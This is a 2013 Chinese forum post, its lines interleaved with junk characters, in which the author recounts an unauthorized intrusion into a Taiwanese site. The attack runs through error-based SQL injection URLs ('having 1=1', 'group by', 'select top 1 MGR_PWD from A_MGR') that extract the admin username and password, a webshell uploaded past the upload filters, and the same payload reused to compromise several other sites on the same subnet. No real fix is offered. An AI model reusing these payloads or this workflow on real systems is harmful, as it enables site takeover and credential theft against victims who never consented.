发现一个注入点& u6 ?2 c' [/ `' m& A
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
) L& J# `! }) }+ D' `, j
+ Q% b+ [- T, o% ?% B习惯性的加’having1=1--- J2 O6 n* C6 }* K. g
1 f$ v/ }1 I8 qhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
0 z% T8 b% v3 y. } E; W+ K2 }: V$ H/ k& o4 r) ?1 V: E
0, T) j( t# E& u: B8 u/ o. s0 W
: Q% Q5 L0 A0 D7 b+ v
爆出Diary_A.dl_Title(这时候很激动啊)9 o! h/ Q* L4 r! S& n/ ]9 X3 P
: r M, m7 C* ?; ~' Q5 @那么继续
6 q5 H$ X1 x, O' Lhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
4 _ U: A- `7 |2 y" |/ u: Z4 _- k3 R+ w! K* R9 J. x& u2 K
继续,一直爆下去! _: `; S% l: V! F3 V" @+ }2 Y
/ J/ x. `- I0 V4 z8 M/ |爆到几个字段和表段 但是没找到需要的管理用户的字段1 {7 W% T8 ^4 p# e' U
' }2 R- H5 @8 N$ f9 C. e9 K蛋疼了 怎么办 然后去后台登陆页看源码: q% v. W( M, J. E6 F& D" |8 s
& O% f: A" Y+ D3 D$ \; Z
0
; \4 u% I6 Z7 y# T7 n# J& \
* I- S' N* I" _3 w5 U3 q& K Y. ? BInput name= “ADUID”
n2 {0 d# \3 ~% bInput name= “ADPWD”# W' o2 T# q5 f5 ?/ S, l
2 E0 b2 U% g+ p; E2 L9 }4 J% [
很幸运 找到了字段那就继续
+ f: T/ L& v1 t2 z0 `9 C' I9 o: V找到之后开始爆用户
/ e/ J* U5 S" j6 Ihttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
. `) ~, R l% G爆密码
, Z% L e" f3 l/ M4 Mhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—# `1 M2 q2 H5 h% [9 r
测试了下 这个注入点只能爆到文章哪里的表
* a+ _% Q+ s0 F& f( [% R/ _
2 n ^# b3 a3 H/ P7 {; ?1 j, v头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
( s7 x' t1 K/ @" ^4 L
5 Z/ q# h3 G- x1 x又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了6 Z3 n, \1 R. t' r/ {
, P9 m4 @7 W5 W1 A473
) I; v$ `$ A- d& {
1 j' x! s0 M5 a" w* H进后台- h& }3 X4 K5 [ z }3 o z
/ B. X1 }; R! p, c8 Y
, w( f x0 I+ s; d8 F& M发现几个上传点 有的地方不能上传 而且防止恶意代码
% z5 f' x7 Y9 r( I- w \- i5 V$ r9 C, G
没办法 各种百度各种找大牛 找到一只好像可以突破的马" Z. P" g, A( \
6 m5 A( |8 n$ {# f5 P( x
6 g* Z: \4 A9 f/ V' d4 g' @
在系统管理那里直接上传 不过没有显示地址
. e" s# q# G2 O9 D/ c2 P8 T' c& h) `1 ?0 Q: [9 W3 j% [
再上传一次 抓包 搞定OK
9 ^: q* t! P+ `
$ n$ E0 f6 u' A9 z# I' O% X6 @5 c3 s6 h+ ^) a$ D$ e
* R4 ~8 B* P+ Z; ~9 }1 ], W
472
8 \" p6 T- e0 X0 U
) X7 i) W, L' P) R$ K晚上不行了 去睡觉。。。
6 `; `3 R: C# N' X' V! |第二天刚起床 闲的没事做继续日站吧 # X1 X9 d7 q& [/ u9 V
: v _1 O" F0 r Z% O3 C
找个站 就把这个站的旁c扫了下' s( U# P8 p' j# { O9 l2 M6 _
9 h% k) w3 w2 r2 b- F( H发现c段也有一个购物站 ,然后还和这个站的模板差不多
% }/ }6 U* c+ p% U. _$ J$ y& ^# ^/ l9 A3 s
就找到会员登录口测试6 L! Y* v6 L! r" y6 _5 _$ T
1 _7 X. P7 F; r" X: i
'and (select top 1 MGR_UID from A_MGR)>0—6 t6 A7 f( {5 ?# t( D
果断爆到了 这时候我很激动 通杀
9 L, C) `* s! \5 R, F
8 n% L) y4 `6 H& ?4 P. i/ E再次翻c段
* w# x, J% D2 `9 A7 B+ N( v0 m3 h- e/ M9 E: [5 S/ V: z
翻出几个站 都成功拿下" i' X; O6 i d3 S
5 M7 D6 I1 c0 M V8 o2 p
+ x2 ]- o3 N7 F( `$ L) W8 S8 I, g
% p' l+ s$ ]6 }+ e& h$ P修复方案:* Z5 f# U4 S! @2 [, y
他们比我专业 " G+ p9 r/ g! r2 k8 @8 n! o" R
$ q: |2 r- n4 P4 Z8 Z! a* C) T
; T) x: L9 e* l! z _7 L" }+ q8 y, C
$ }; _9 |3 [- Z' M |
发表于 2013-4-4 17:40:38
收藏
支持
反对